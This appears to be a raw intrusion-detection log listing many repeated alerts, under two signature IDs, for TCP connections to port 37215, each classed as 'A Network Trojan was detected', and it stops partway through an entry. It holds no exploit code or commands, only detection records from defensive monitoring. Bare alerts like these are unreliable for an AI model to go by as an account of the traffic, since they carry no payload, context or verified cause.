          SID:2835222
          Source Port:37602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740201
          SID:2835222
          Source Port:37474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495747
          SID:2835222
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081823
          SID:2829579
          Source Port:52142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705236
          SID:2835222
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894387
          SID:2829579
          Source Port:51798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016080
          SID:2835222
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843745
          SID:2835222
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747722
          SID:2829579
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267991
          SID:2835222
          Source Port:33058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176315
          SID:2829579
          Source Port:40940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039532
          SID:2829579
          Source Port:39252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192425
          SID:2829579
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297358
          SID:2829579
          Source Port:38644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835605
          SID:2835222
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260975
          SID:2829579
          Source Port:38778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892561
          SID:2835222
          Source Port:47942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463023
          SID:2829579
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800844
          SID:2829579
          Source Port:51050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860368
          SID:2835222
          Source Port:39360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510428
          SID:2835222
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799752
          SID:2835222
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891520
          SID:2835222
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670554
          SID:2829579
          Source Port:48004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735084
          SID:2829579
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740943
          SID:2835222
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261003
          SID:2835222
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238937
          SID:2835222
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730515
          SID:2829579
          Source Port:60246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672257
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036290
          SID:2829579
          Source Port:53542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408650
          SID:2829579
          Source Port:50602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.798608
          SID:2829579
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893557
          SID:2835222
          Source Port:47352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705909
          SID:2829579
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888243
          SID:2835222
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738938
          SID:2829579
          Source Port:58366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741705
          SID:2829579
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704005
          SID:2829579
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673004
          SID:2835222
          Source Port:47250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.360925
          SID:2835222
          Source Port:51046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115741
          SID:2835222
          Source Port:36120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514386
          SID:2829579
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133174
          SID:2829579
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546482
          SID:2835222
          Source Port:57170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891168
          SID:2835222
          Source Port:38618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173608
          SID:2829579
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157100
          SID:2829579
          Source Port:56640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043109
          SID:2835222
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130698
          SID:2829579
          Source Port:57788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191591
          SID:2835222
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236762
          SID:2835222
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709050
          SID:2835222
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511544
          SID:2835222
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602613
          SID:2829579
          Source Port:43562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271245
          SID:2835222
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239964
          SID:2829579
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113171
          SID:2835222
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351428
          SID:2829579
          Source Port:42258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258710
          SID:2835222
          Source Port:34064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111081
          SID:2829579
          Source Port:32976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792155
          SID:2829579
          Source Port:55610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445036
          SID:2835222
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405867
          SID:2829579
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460658
          SID:2829579
          Source Port:52706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168467
          SID:2835222
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081179
          SID:2835222
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044710
          SID:2829579
          Source Port:55958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114557
          SID:2835222
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187809
          SID:2835222
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542398
          SID:2835222
          Source Port:58902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600014
          SID:2829579
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824896
          SID:2829579
          Source Port:39240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114040
          SID:2829579
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107881
          SID:2829579
          Source Port:34740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114353
          SID:2829579
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446273
          SID:2829579
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150914
          SID:2829579
          Source Port:49020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708689
          SID:2835222
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603243
          SID:2829579
          Source Port:49528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132632
          SID:2835222
          Source Port:58814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861906
          SID:2829579
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019217
          SID:2835222
          Source Port:54108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295077
          SID:2829579
          Source Port:50882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353606
          SID:2835222
          Source Port:54030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782435
          SID:2835222
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152895
          SID:2835222
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897106
          SID:2835222
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268304
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448740
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599530
          SID:2829579
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669612
          SID:2829579
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808066
          SID:2829579
          Source Port:48814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799783
          SID:2829579
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744571
          SID:2835222
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084852
          SID:2835222
          Source Port:55450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896170
          SID:2829579
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742310
          SID:2829579
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155758
          SID:2829579
          Source Port:53592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127355
          SID:2829579
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019116
          SID:2835222
          Source Port:44314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810193
          SID:2835222
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461123
          SID:2829579
          Source Port:50996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107263
          SID:2835222
          Source Port:46566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266354
          SID:2835222
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730549
          SID:2829579
          Source Port:38068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600306
          SID:2835222
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705713
          SID:2829579
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912453
          SID:2829579
          Source Port:41530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159282
          SID:2835222
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671383
          SID:2829579
          Source Port:45694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354811
          SID:2835222
          Source Port:48256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511165
          SID:2835222
          Source Port:59604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158545
          SID:2835222
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.277172
          SID:2829579
          Source Port:50408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106964
          SID:2835222
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039412
          SID:2835222
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406424
          SID:2829579
          Source Port:42852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787625
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274780
          SID:2835222
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800944
          SID:2829579
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405272
          SID:2835222
          Source Port:43822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274648
          SID:2829579
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465287
          SID:2829579
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818614
          SID:2835222
          Source Port:51146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018441
          SID:2835222
          Source Port:33826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842017
          SID:2829579
          Source Port:57054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085019
          SID:2835222
          Source Port:58130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149841
          SID:2829579
          Source Port:35442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158375
          SID:2829579
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748978
          SID:2835222
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2829579
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731366
          SID:2829579
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017849
          SID:2829579
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409502
          SID:2829579
          Source Port:49116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132043
          SID:2829579
          Source Port:58732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606087
          SID:2829579
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184173
          SID:2835222
          Source Port:46800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508765
          SID:2835222
          Source Port:53132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354483
          SID:2829579
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174116
          SID:2829579
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911966
          SID:2829579
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107312
          SID:2835222
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021116
          SID:2829579
          Source Port:34696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789833
          SID:2835222
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822473
          SID:2835222
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708770
          SID:2835222
          Source Port:38394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894113
          SID:2829579
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818938
          SID:2829579
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863165
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160470
          SID:2835222
          Source Port:41082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812872
          SID:2835222
          Source Port:51796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857440
          SID:2835222
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108826
          SID:2835222
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911915
          SID:2829579
          Source Port:35232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275629
          SID:2829579
          Source Port:45986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745204
          SID:2835222
          Source Port:56650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857053
          SID:2835222
          Source Port:38264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513382
          SID:2829579
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798778
          SID:2835222
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800997
          SID:2835222
          Source Port:40336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817800
          SID:2835222
          Source Port:49170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107795
          SID:2835222
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192308
          SID:2835222
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600396
          SID:2835222
          Source Port:60676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019648
          SID:2835222
          Source Port:46234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896335
          SID:2829579
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708300
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354568
          SID:2835222
          Source Port:40198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274604
          SID:2835222
          Source Port:48594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180369
          SID:2835222
          Source Port:54794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807055
          SID:2829579
          Source Port:49716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239941
          SID:2835222
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067940
          SID:2835222
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671135
          SID:2829579
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018286
          SID:2835222
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730832
          SID:2835222
          Source Port:42790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152258
          SID:2829579
          Source Port:41646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444582
          SID:2829579
          Source Port:41266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832321
          SID:2829579
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668543
          SID:2835222
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406153
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883782
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895131
          SID:2829579
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513832
          SID:2835222
          Source Port:34542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732826
          SID:2835222
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510987
          SID:2835222
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161599
          SID:2835222
          Source Port:40872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606186
          SID:2835222
          Source Port:36864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354552
          SID:2829579
          Source Port:37284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163300
          SID:2829579
          Source Port:38620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462782
          SID:2835222
          Source Port:54132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351231
          SID:2835222
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109251
          SID:2829579
          Source Port:50304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462633
          SID:2829579
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394172
          SID:2835222
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512291
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788784
          SID:2829579
          Source Port:58830
          Destination Port:37215
